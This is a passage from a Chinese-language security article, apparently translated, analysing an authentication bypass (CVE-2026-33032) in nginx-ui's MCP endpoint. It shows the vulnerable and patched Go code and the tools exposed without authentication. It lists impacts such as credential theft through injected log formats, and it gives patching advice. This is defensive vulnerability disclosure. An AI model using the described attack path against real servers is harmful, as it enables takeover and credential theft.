2px;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;color: #ff6441;"><span leaf="">GET /mcp</span></code><span leaf=""> - 打开一个持久的SSE流。用于建立持久的Server-Sent Events连接以接收JSON-RPC响应并启动会话。</span></p><p data-tool="mdnice 编辑器" style="padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;font-size: 14px;"><code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;color: #ff6441;"><span leaf="">POST /mcp_message</span></code><span leaf=""> - 用于向MCP服务器发送命令。</span></p><p data-tool="mdnice 编辑器" style="padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;font-size: 14px;"><span leaf="">当一个客户端发送GET请求到 </span><code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;color: #ff6441;"><span leaf="">/mcp</span></code><span leaf=""> 端点以打开流时，服务器会响应一个会话ID，如下所示：</span></p><pre data-tool="mdnice 编辑器" style="margin-top: 10px;margin-bottom: 10px;box-shadow: rgba(170, 170, 170, 0.48) 0px 0px 6px 0px;max-width: 100%;border-radius: 4px;margin: 10px auto 0 auto;"><code style="overflow-x: auto;padding: 16px;background: #fff;color: black;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;border-radius: 0px;font-size: 12px;-webkit-overflow-scrolling: touch;"><span leaf="">data: /mcp_message?sessionId=9a7f3d21-6c5e-4b8a-9d72-3f1e8c4b2a11</span></code></pre><p data-tool="mdnice 编辑器" style="padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;font-size: 14px;"><span leaf="">之后，通过POST请求调用工具到 </span><code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;color: #ff6441;"><span leaf="">/mcp_message</span></code><span leaf=""> 端点，并携带有效的 </span><code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;color: #ff6441;"><span leaf="">sessionId</span></code><span leaf="">，响应通过SSE流发送回客户端。这里，nginx-ui使用 </span><code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;color: #ff6441;"><span leaf="">node_secret</span></code><span leaf=""> 对MCP连接进行身份验证。</span></p><p data-tool="mdnice 编辑器" style="padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;font-size: 14px;"><span leaf="">但你现在肯定在想这有什么问题，到目前为止一切看起来都正常。我们来看看。</span></p><h3 data-tool="mdnice 编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;background-color: #000;color: #fff;padding: 2px 10px;width: fit-content;font-size: 17px;margin: 60px auto 10px;"><span leaf="">理解安全漏洞</span></h3><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="swift"><code><span leaf=""><span class="code-snippet__comment">// Vulnerable Code</span></span></code><br/><code><span leaf=""><span class="code-snippet__keyword">func</span> <span class="code-snippet__title">InitRouter</span>(r <span class="code-snippet__operator">*</span>gin.<span class="code-snippet__type">Engine</span>) {</span></code><br/><code><span leaf=""> r.<span class="code-snippet__keyword">Any</span>(</span></code><br/><code><span leaf=""><span class="code-snippet__string">&#34;/mcp&#34;</span></span></code><br/><code><span leaf="">, middleware.<span class="code-snippet__type">IPWhiteList</span>(), middleware.<span class="code-snippet__type">AuthRequired</span>(),</span></code><br/><code><span leaf="">  <span class="code-snippet__keyword">func</span>(c <span class="code-snippet__operator">*</span>gin.<span class="code-snippet__type">Context</span>) {</span></code><br/><code><span leaf="">   mcp.<span class="code-snippet__type">ServeHTTP</span>(c)</span></code><br/><code><span leaf="">  })</span></code><br/><code><span leaf=""> r.<span class="code-snippet__keyword">Any</span>(</span></code><br/><code><span leaf=""><span class="code-snippet__string">&#34;/mcp_message&#34;</span></span></code><br/><code><span leaf="">, middleware.<span class="code-snippet__type">IPWhiteList</span>(),</span></code><br/><code><span leaf="">  <span class="code-snippet__keyword">func</span>(c <span class="code-snippet__operator">*</span>gin.<span class="code-snippet__type">Context</span>) {</span></code><br/><code><span leaf="">   mcp.<span class="code-snippet__type">ServeHTTP</span>(c)</span></code><br/><code><span leaf="">  })</span></code><br/><code><span leaf="">}</span></code><br/></pre></p><p data-tool="mdnice 编辑器" style="padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;font-size: 14px;"><span leaf="">如果你仔细观察，</span><code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;color: #ff6441;"><span leaf="">/mcp</span></code><span leaf=""> 端点受 </span><code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;color: #ff6441;"><span leaf="">middleware.AuthRequired()</span></code><span leaf=""> 保护，但 </span><code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;color: #ff6441;"><span leaf="">/mcp_message</span></code><span leaf=""> 没有。因为 </span><code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;color: #ff6441;"><span leaf="">mcp.ServeHTTP()</span></code><span leaf=""> 处理所有的MCP工具调用，任何人都可以在未经身份验证的情况下通过 </span><code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;color: #ff6441;"><span leaf="">/mcp_message</span></code><span leaf=""> 端点执行工具。</span></p><p data-tool="mdnice 编辑器" style="padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;font-size: 14px;"><span leaf="">虽然 </span><code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;color: #ff6441;"><span leaf="">/mcp_message</span></code><span leaf=""> 端点确实使用了 </span><code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;color: #ff6441;"><span leaf="">middleware.IPWhiteList()</span></code><span leaf="">，但这一层仅存的保护自身存在一个关键缺陷：</span></p><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="go"><code><span leaf=""><span class="code-snippet__comment">// internal/middleware/ip_whitelist.go:11-26 - Empty whitelist allows all</span></span></code><br/><code><span leaf=""><span class="code-snippet__function"><span class="code-snippet__keyword">func</span></span><span class="code-snippet__function"><span class="code-snippet__title">IPWhiteList</span></span><span class="code-snippet__function"><span class="code-snippet__params">()</span></span> gin.HandlerFunc {</span></code><br/><code></code><br/><code><span leaf=""><span class="code-snippet__keyword">return</span></span></code><br/><code><span leaf=""> <span class="code-snippet__function"><span class="code-snippet__keyword">func</span></span><span class="code-snippet__function"><span class="code-snippet__params">(c *gin.Context)</span></span> {</span></code><br/><code><span leaf="">  clientIP := c.ClientIP()</span></code><br/><code></code><br/><code><span leaf=""><span class="code-snippet__keyword">if</span></span></code><br/><code><span leaf=""> <span class="code-snippet__built_in">len</span>(settings.AuthSettings.IPWhiteList) == <span class="code-snippet__number">0</span> || clientIP == </span></code><br/><code><span leaf=""><span class="code-snippet__string">&#34;&#34;</span></span></code><br/><code><span leaf=""> || clientIP == </span></code><br/><code><span leaf=""><span class="code-snippet__string">&#34;127.0.0.1&#34;</span></span></code><br/><code><span leaf=""> || clientIP == </span></code><br/><code><span leaf=""><span class="code-snippet__string">&#34;::1&#34;</span></span></code><br/><code><span leaf=""> {</span></code><br/><code><span leaf="">   c.Next()</span></code><br/><code></code><br/><code><span leaf=""><span class="code-snippet__keyword">return</span></span></code><br/><code><span leaf="">  }</span></code><br/><code><span leaf="">  <span class="code-snippet__comment">// ...</span></span></code><br/><code><span leaf=""> }</span></code><br/><code><span leaf="">}</span></code><br/></pre></p><p data-tool="mdnice 编辑器" style="padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;font-size: 14px;"><span leaf="">这里，我们可以看到如果 </span><code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;color: #ff6441;"><span leaf="">IPWhiteList</span></code><span leaf=""> 为空，那么这个机制就完全失效，因为它允许所有没有IP过滤的请求；并且默认安装时 </span><code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;color: #ff6441;"><span leaf="">IPWhiteList</span></code><span leaf=""> 是空的，这是一个失效开放的设计。</span></p><p data-tool="mdnice 编辑器" style="padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;font-size: 14px;"><span leaf="">总之，如果 </span><code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;color: #ff6441;"><span leaf="">IPWhiteList</span></code><span leaf=""> 为空，那么下面列出的12个MCP工具可以在没有任何身份验证的情况下被攻击者访问。</span></p><h3 data-tool="mdnice 编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;background-color: #000;color: #fff;padding: 2px 10px;width: fit-content;font-size: 17px;margin: 60px auto 10px;"><span leaf="">可用的MCP工具</span></h3><p data-tool="mdnice 编辑器" style="padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;font-size: 14px;"><span leaf="">来自 </span><code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;color: #ff6441;"><span leaf="">mcp/nginx/</span></code><span leaf="">:</span></p><ul style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: black;list-style-type: square;" class="list-paddingleft-1"><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;"><code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;color: #ff6441;"><span leaf="">restart_nginx</span></code><span leaf=""> - 重启Nginx进程</span></p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;"><code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;color: #ff6441;"><span leaf="">reload_nginx</span></code><span leaf=""> - 重新加载Nginx配置</span></p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;"><code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;color: #ff6441;"><span leaf="">nginx_status</span></code><span leaf=""> - 读取Nginx状态</span></p></li></ul><p data-tool="mdnice 编辑器" style="padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;font-size: 14px;"><span leaf="">来自 </span><code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;color: #ff6441;"><span leaf="">mcp/config/</span></code><span leaf="">:</span></p><ul style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: black;list-style-type: square;" class="list-paddingleft-1"><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;"><code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;color: #ff6441;"><span leaf="">nginx_config_add</span></code><span leaf=""> - 创建新的Nginx配置文件</span></p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;"><code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;color: #ff6441;"><span leaf="">nginx_config_modify</span></code><span leaf=""> - 修改现有配置文件</span></p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;"><code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;color: #ff6441;"><span leaf="">nginx_config_list</span></code><span leaf=""> - 列出所有配置</span></p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;"><code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;color: #ff6441;"><span leaf="">nginx_config_get</span></code><span leaf=""> - 读取配置文件内容</span></p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;"><code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;color: #ff6441;"><span leaf="">nginx_config_enable</span></code><span leaf=""> - 启用/禁用站点</span></p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;"><code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;color: #ff6441;"><span leaf="">nginx_config_rename</span></code><span leaf=""> - 重命名配置文件</span></p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;"><code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;color: #ff6441;"><span leaf="">nginx_config_mkdir</span></code><span leaf=""> - 创建目录</span></p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;"><code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;color: #ff6441;"><span leaf="">nginx_config_history</span></code><span leaf=""> - 查看配置历史</span></p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;"><code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;color: #ff6441;"><span leaf="">nginx_config_base_path</span></code><span leaf=""> - 获取Nginx配置目录路径</span></p></li></ul><h3 data-tool="mdnice 编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;background-color: #000;color: #fff;padding: 2px 10px;width: fit-content;font-size: 17px;margin: 60px auto 10px;"><span leaf="">影响</span></h3><ol style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: black;list-style-type: decimal;" class="list-paddingleft-1"><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;"><span leaf="">攻击者可以完全控制Nginx服务，并且可以在配置目录内创建、修改和删除任何Nginx配置文件，这会触发立即重启。</span></p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;"><span leaf="">攻击者可以通过代理所有流经攻击者控制端点的流量，窃取凭证、会话令牌和其他敏感数据。</span></p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;"><span leaf="">写入无效的配置文件会导致服务器重启并完全中断服务。</span></p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;"><span leaf="">攻击者可以通过注入包含自定义 </span><code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;color: #ff6441;"><span leaf="">log_format</span></code><span leaf=""> 模式的 </span><code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;color: #ff6441;"><span leaf="">access_logs</span></code><span leaf=""> 指令来捕获 </span><code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;color: #ff6441;"><span leaf="">Authorization</span></code><span leaf=""> 头，这使其能够提升权限，访问REST API。</span></p></li></ol><p data-tool="mdnice 编辑器" style="padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;font-size: 14px;"><span leaf="">数据显示全球范围内暴露的Nginx实例数量。</span></p><p data-tool="mdnice 编辑器" style="padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;font-size: 14px;"><span leaf="">全球共有2689个暴露的实例，其中大部分来自中国、美国、印度尼西亚、德国和香港。</span></p><p style="text-align: center;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="502780799" data-ratio="0.55" data-s="300,640" type="block" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=14ef077f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FTKdPSwEibsZgicicOmDKg5KXKu42J3NkAodpeNUMWwvsTWp8AoiaO0wEfIAjdrY5GalkbYhkeUSwuM0Blpc33ouDV2uG1kDA6TSGpe3VVZgo6CM%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><h2 data-tool="mdnice 编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-size: 22px;text-align: center;font-weight: bold;color: black;line-height: 1.1em;padding-top: 12px;padding-bottom: 12px;margin: 70px 30px 30px;border: 1px solid #000;"><span style="display: block;-webkit-box-reflect: below 0em -webkit-gradient(linear,left top,left bottom, from(rgba(0,0,0,0)),to(rgba(255,255,255,0.1)));"><span leaf="">现在该怎么做？</span></span></h2><p data-tool="mdnice 编辑器" style="padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;font-size: 14px;"><span leaf="">已确认</span><code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;color: #ff6441;"><span leaf="">CVE-2026-33032</span></code><span leaf="">在野被积极利用。如果你正在运行易受攻击的版本，请立即更新。</span></p><p data-tool="mdnice 编辑器" style="padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;font-size: 14px;"><span leaf="">如果你正在运行启用了MCP的nginx-ui：</span></p><ul style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: black;list-style-type: square;" class="list-paddingleft-1"><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;"><span leaf="">立即更新到 </span><code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;color: #ff6441;"><span leaf="">v2.3.4</span></code><span leaf=""> 或更高版本</span></p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;"><span leaf="">如果你无法立即更新，请立即禁用MCP，或者紧急地将可信主机添加到IP白名单中，切勿将其留空。</span></p></li></ul><h3 data-tool="mdnice 编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;background-color: #000;color: #fff;padding: 2px 10px;width: fit-content;font-size: 17px;margin: 60px auto 10px;"><span leaf="">修复</span></h3><p data-tool="mdnice 编辑器" style="padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;font-size: 14px;"><span leaf="">该漏洞在2026年3月15日发布的 </span><code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;color: #ff6441;"><span leaf="">v2.3.4</span></code><span leaf=""> 中得到了修复，你猜对了，修复方法就是在 </span><code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;color: #ff6441;"><span leaf="">/mcp_message</span></code><span leaf=""> 端点上添加缺失的身份验证。</span></p><p data-tool="mdnice 编辑器" style="padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;font-size: 14px;"><span leaf="">修复后的代码看起来像这样：</span></p></div><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="swift"><code><span leaf=""><span class="code-snippet__comment">// Patched code</span></span></code><br/><code><span leaf="">r.<span class="code-snippet__keyword">Any</span>(</span></code><br/><code><span leaf=""><span class="code-snippet__string">&#34;/mcp_message&#34;</span></span></code><br/><code><span leaf="">, middleware.<span class="code-snippet__type">IPWhiteList</span>(), middleware.<span class="code-snippet__type">AuthRequired</span>(),</span></code><br/><code><span leaf=""><span class="code-snippet__keyword">func</span></span></code><br/><code><span leaf="">(c <span class="code-snippet__operator">*</span>gin.<span class="code-snippet__type">Context</span>)</span></code><br/><code><span leaf=""> {</span></code><br/><code><span leaf="">        mcp.<span class="code-snippet__type">ServeHTTP</span>(c)</span></code><br/><code><span leaf="">    })</span></code><br/></pre></p><p data-tool="markdown2wechat编辑器" data-website="https://aizhuanqian.com" style="word-spacing: 0px;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;text-align: left;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;padding: 8px 10px;margin: 0px;line-height: 26px;color: black;font-size: 14px;" data-pm-slice="0 0 []"><span leaf="">原文：</span></p><p data-tool="markdown2wechat编辑器" data-website="https://aizhuanqian.com" style="word-spacing: 0px;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;text-align: left;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;padding: 8px 10px;margin: 0px;line-height: 26px;color: black;font-size: 14px;" data-pm-slice="0 0 []"><span leaf=""><a href="https://infosecwriteups.com/cve-2026-33032-exploitation-allows-full-control-over-nginx-server-838949e8637c" target="_blank">https://infosecwriteups.com/cve-2026-33032-exploitation-allows-full-control-over-nginx-server-838949e8637c</a></span></p><p style="text-align: center;" data-pm-slice="2 2 []"><span leaf="">如果你是一个长期主义者，欢迎加入我的知识星球，本星球日日更新,包含号主大量一线实战,全网独一无二，微信识别二维码付费即可加入，如不满意，72 小时内可在 App 内无条件自助退款</span></p><p data-tool="markdown2wechat编辑器" data-website="https://aizhuanqian.com" style="word-spacing: 0px;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;text-align: left;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;padding: 8px 10px;margin: 0px;line-height: 26px;color: black;font-size: 14px;" data-pm-slice="0 0 []"><span leaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100012574" data-ratio="0.5493333333333333" data-s="300,640" data-w="750" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=033161f8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FYmmVSe19Qj5EMr3X76qdKBrhIIkBlVVyuiaiasseFZ9LqtibyKFk7gXvgTU2C2yEwKLaaqfX0DL3eoH6gTcNLJvDQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p><span style="box-sizing: border-box;text-align: center;display: inline-block;height: 38px;line-height: 42px;color: rgb(72, 179, 120);background-position: left center;background-repeat: no-repeat;background-attachment: initial;background-origin: initial;background-clip: initial;background-size: 63px;margin-top: 38px;font-size: 18px;margin-bottom: 10px;"><span leaf="">往期回顾</span></span></p><h1 data-pm-slice="0 0 []"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247497813&amp;idx=1&amp;sn=c778ad6a4bffd7a0a72a900144ea90ca&amp;scene=21#wechat_redirect" textvalue="如何利用ai辅助挖漏洞" data-itemshowtype="0" linktype="text" data-linktype="2">如何利用ai辅助挖漏洞</a></span></h1><h1 data-pm-slice="0 0 []"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247497880&amp;idx=1&amp;sn=b9b980464333074216b55ea94c8a743a&amp;scene=21#wechat_redirect" textvalue="如何在移动端抓包-下" data-itemshowtype="0" linktype="text" data-linktype="2">如何在移动端抓包-下</a></span></h1><h1 data-pm-slice="0 0 []"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;h1&#34;,&#34;attributes&#34;:{&#34;id&#34;:&#34;activity-name&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247497491&amp;idx=1&amp;sn=a1b00b9a8a54eb96aa3ba8bf23cb7e28&amp;scene=21#wechat_redirect" textvalue="如何绕过签名校验" data-itemshowtype="0" linktype="text" data-linktype="2">如何绕过签名校验</a></span></h1><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247495880&amp;idx=1&amp;sn=65d42fbff5e198509e55072674ac5283&amp;chksm=e8a5faabdfd273bd55df8f7db3d644d3102d7382020234741e37ca29e963eace13dd17fcabdd&amp;scene=21#wechat_redirect" textvalue="一款bp神器" data-itemshowtype="0" linktype="text" data-linktype="2">一款bp神器</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247496898&amp;idx=1&amp;sn=b6088e20a8b4fc9fbd887b900d8c5247&amp;scene=21#wechat_redirect" textvalue="挖掘有回显ssrf的隐藏payload" data-itemshowtype="0" linktype="text" data-linktype="2">挖掘有回显ssrf的隐藏payload</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247495841&amp;idx=1&amp;sn=bbf477afa30391b8072d23469645d026&amp;chksm=e8a5fac2dfd273d42344f18c7c6f0f7a158cca94041c4c4db330c3adf2d1f77f062dcaf6c5e0&amp;scene=21#wechat_redirect" 